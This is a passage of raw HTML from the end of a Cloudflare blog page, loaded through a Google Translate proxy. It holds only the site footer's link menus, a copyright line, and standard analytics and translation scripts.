pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/the-net/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="theNet" class="f1 blue3 no-underline underline-hover" rel="noreferrer">theNet</a></li> </ul> </div> <div class="main-footer__menu-group"> <ul id="sales-menu" class="list pl0"> <li class="pt1 pb1 f1 main-footer__menu-group__header js-toggle-footer-group" data-submenu="sales-menu">Solutions<i class="icon-caret-down"></i></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/connectivity-cloud/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="connectivity-cloud" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Connectivity cloud</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/zero-trust/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="zero-trust" class="f1 blue3 no-underline underline-hover" rel="noreferrer">SSE and SASE services</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/application-services/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="application-services" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Application services</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/network-services/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="network-services" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Network services</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/developer-platform/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="developer-services" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Developer services</a></li> </ul> </div> <div class="main-footer__menu-group"> <ul id="community-menu" class="list pl0"> <li class="pt1 pb1 f1 main-footer__menu-group__header js-toggle-footer-group" data-submenu="community-menu">Community<i class="icon-caret-down"></i></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://community.cloudflare.com" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="community_hub" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Community Hub</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/galileo/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="galileo" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Project Galileo</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/athenian/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="athenian" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Athenian Project</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/campaigns/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="cloudflare-for-campaigns" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Cloudflare for Campaigns</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/partners/technology-partners/cidp/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="critical-infrastructure-defense-project" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Critical Infrastructure Defense Project</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/connect2024/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="connect-2024" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Connect 2024</a></li> </ul> </div> <div class="main-footer__menu-group"> <ul id="support-menu" class="list pl0"> <li class="pt1 pb1 f1 main-footer__menu-group__header js-toggle-footer-group" data-submenu="support-menu">Support<i class="icon-caret-down"></i></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://support.cloudflare.com" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="help-center" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Help center</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflarestatus.com" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="status" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Cloudflare Status</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/compliance/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="compliance" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Compliance</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/gdpr/introduction/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="gdpr" class="f1 blue3 no-underline underline-hover" rel="noreferrer">GDPR</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/trust-hub/abuse-approach/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="trust-and-safety" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Trust & Safety</a></li> </ul> </div> <div class="main-footer__menu-group"> <ul id="company-menu" class="list pl0"> <li class="pt1 pb1 f1 main-footer__menu-group__header js-toggle-footer-group" data-submenu="company-menu">Company<i class="icon-caret-down"></i></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/about-overview/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="overview" class="f1 blue3 no-underline underline-hover" rel="noreferrer">About Cloudflare</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/people/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="our_team" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Our team</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://cloudflare.net/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="investor-relations" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Investor relations</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/press/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="press" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Press</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/careers/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="careers" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Careers</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/diversity-equity-and-inclusion/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="diversity-equity-inclusion" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Diversity, equity & inclusion</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/impact/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="impact-ESG" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Impact/ESG</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/network/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="network_map" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Network Map</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/press-kit/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="press-kit" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Logos & press kit</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/partners/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="partners" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Become a partner</a></li> </ul> </div> </div> </div> <div class="mw8 center ph3"> <div class="flex flex-row flex-wrap justify-center md:justify-between items-center pt4"> <div class="flex flex-row space-x-4 items-start w-25-l pb4 pb0-l"> <a target="_blank" rel="noreferrer" href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.facebook.com/Cloudflare/" class="w-8"><img class="w-8" src="https://www.cloudflare.com/img/footer/facebook.svg" alt="facebook"></a><a target=" _blank" rel="noreferrer" href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://x.com/Cloudflare" class="w-8"><img class="w-8" src="https://www.cloudflare.com/img/footer/twitter.svg" alt="X"></a><a target="_blank" rel="noreferrer" href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.linkedin.com/company/cloudflare" class="w-8"><img class="w-8" src="https://www.cloudflare.com/img/footer/linkedin.svg" alt="linkedin"></a><a target="_blank" rel="noreferrer" href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.youtube.com/cloudflare" class="w-8"><img class="w-8" src="https://www.cloudflare.com/img/footer/youtube.svg" alt="youtube"></a><a target="_blank" rel="noreferrer" href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.instagram.com/cloudflare" class="w-8"><img class="w-8" src="https://www.cloudflare.com/img/footer/instagram.svg" alt="instagram"></a> </div> <div class="w-70-l tr-l tl-ns"> <div> <span class="main-footer__copyright f1">© <!-- -->2025<!-- --> Cloudflare, Inc.<!-- --> </span><span class="main-footer__copyright f1">|</span><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/privacypolicy/" target="_blank" class="main-footer__copyright f1 no-underline underline-hover" rel="noreferrer"> <!-- -->Privacy Policy<!-- --> </a><span class="main-footer__copyright f1">|</span><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/website-terms/" target="_blank" class="main-footer__copyright f1 no-underline underline-hover" rel="noreferrer"> <!-- -->Terms of Use<!-- --> </a><span class="main-footer__copyright f1">|</span><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/disclosure/" target="_blank" class="main-footer__copyright f1 no-underline underline-hover" rel="noreferrer"> <!-- -->Report Security Issues<!-- --> </a><span class="main-footer__copyright f1">|</span><img class="mw2 ph1" src="/images/privacy-options.svg" alt="Privacy Options"><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB#cookie-settings" id="ot-sdk-btn" class="ot-sdk-show-settings main-footer__copyright f1 no-underline underline-hover"><span class="brandGray5">Cookie Preferences</span> </a><span class="main-footer__copyright f1">|</span><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/trademark/" target="_blank" class="main-footer__copyright f1 no-underline underline-hover" rel="noreferrer"> <!-- -->Trademark<!-- --> </a> </div> </div> </div> </div> </footer> <script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon="{"rayId":"9138e4366f58ce01","version":"2025.1.0","serverTiming":{"name":{"cfExtPri":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}},"token":"2bc156e5f250476cb274d269511ffb57","b":1}" crossorigin="anonymous"></script> <script>function gtElInit() {var lib = new google.translate.TranslateService();lib.translatePage('pl', 'de', function () {});}</script> <script src="https://translate.google.com/translate_a/element.js?cb=gtElInit&hl=en-GB&client=wt" type="text/javascript"></script> </body> </html>